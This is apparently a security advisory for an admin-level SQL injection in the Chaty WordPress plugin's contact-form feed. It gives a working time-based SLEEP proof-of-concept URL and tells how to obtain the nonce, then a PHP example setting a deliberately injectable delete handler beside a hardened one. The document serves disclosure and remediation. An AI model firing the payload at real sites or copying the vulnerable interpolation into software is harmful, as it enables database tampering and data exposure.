The plugin does not properly sanitise and escape a parameter before using it in a SQL statement, leading to a SQL injection exploitable by users with a role as low as admin.
https://example.com/wp-admin/admin.php?page=chaty-contact-form-feed&remove_chaty_leads=9a03751f9d&action=delete_message&paged=1&search&chaty_leads=3)+AND+(SELECT+42+FROM+(SELECT(SLEEP(5)))b)%3B–±

To get the nonce, check the source of https://example.com/wp-admin/admin.php?page=chaty-contact-form-feed for remove_chaty_leads.
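The advisory only states that a request parameter reaches a SQL statement without sanitisation or escaping. The following is an added illustration written for this page, not the plugin's own code: it shows that pattern next to a hardened handler in WordPress terms. The table name `chaty_leads`, the function names, the `admin_init` wiring and the nonce action name `chaty_delete_leads` are assumptions; only the request parameters (`page`, `action`, `chaty_leads`, `remove_chaty_leads`) come from the proof of concept above.

```php
<?php
// Added illustration, not the plugin's own code. Table, function and
// nonce-action names are assumptions made for this example.

/**
 * Vulnerable pattern (hypothetical): the raw request value is interpolated
 * into the statement, so a value such as
 * "3) AND (SELECT 42 FROM (SELECT(SLEEP(5)))b);" rewrites the query instead
 * of being treated as an id list.
 */
function chaty_delete_leads_vulnerable( $raw_ids ) {
    global $wpdb;
    $table = $wpdb->prefix . 'chaty_leads'; // assumed table name
    return $wpdb->query( "DELETE FROM {$table} WHERE id IN ({$raw_ids})" );
}

/**
 * Hardened handler: capability check, nonce check (read from the
 * remove_chaty_leads query argument, as in the advisory), strict integer
 * coercion of every id, then a prepared statement with one %d placeholder
 * per id. Note that the nonce alone is not a fix: an admin holds a valid
 * nonce, so the SQL structure must be fixed by parameterisation.
 */
function chaty_delete_leads_hardened( $raw_ids ) {
    global $wpdb;

    if ( ! current_user_can( 'manage_options' ) ) {
        wp_die( 'Insufficient permissions', 403 );
    }
    // Action name is an assumption; it must match the wp_create_nonce() call
    // that emits the remove_chaty_leads value in the admin page.
    check_admin_referer( 'chaty_delete_leads', 'remove_chaty_leads' );

    // Accept "1,2,3" or an array; absint() turns every element into a
    // non-negative int and array_filter() drops zero/invalid entries.
    $ids = is_array( $raw_ids ) ? $raw_ids : explode( ',', (string) $raw_ids );
    $ids = array_filter( array_map( 'absint', $ids ) );
    if ( empty( $ids ) ) {
        return 0;
    }

    $table        = $wpdb->prefix . 'chaty_leads'; // assumed table name
    $placeholders = implode( ',', array_fill( 0, count( $ids ), '%d' ) );
    $sql          = $wpdb->prepare(
        "DELETE FROM {$table} WHERE id IN ({$placeholders})",
        array_values( $ids )
    );
    return $wpdb->query( $sql );
}

// Request wiring (assumed hook and location), matching the parameters in
// the proof-of-concept URL.
add_action( 'admin_init', function () {
    if ( isset( $_GET['page'], $_GET['action'], $_GET['chaty_leads'] )
        && 'chaty-contact-form-feed' === $_GET['page']
        && 'delete_message' === $_GET['action'] ) {
        chaty_delete_leads_hardened( wp_unslash( $_GET['chaty_leads'] ) );
    }
} );
```

With the hardened handler, the injected value from the proof of concept is reduced by `absint()` to the integer `3` and the `SLEEP` clause never reaches the database, so the time-based signal the advisory relies on disappears. Checking for the `%d`-per-id prepared statement (rather than just a nonce check) is the review point when auditing similar delete handlers.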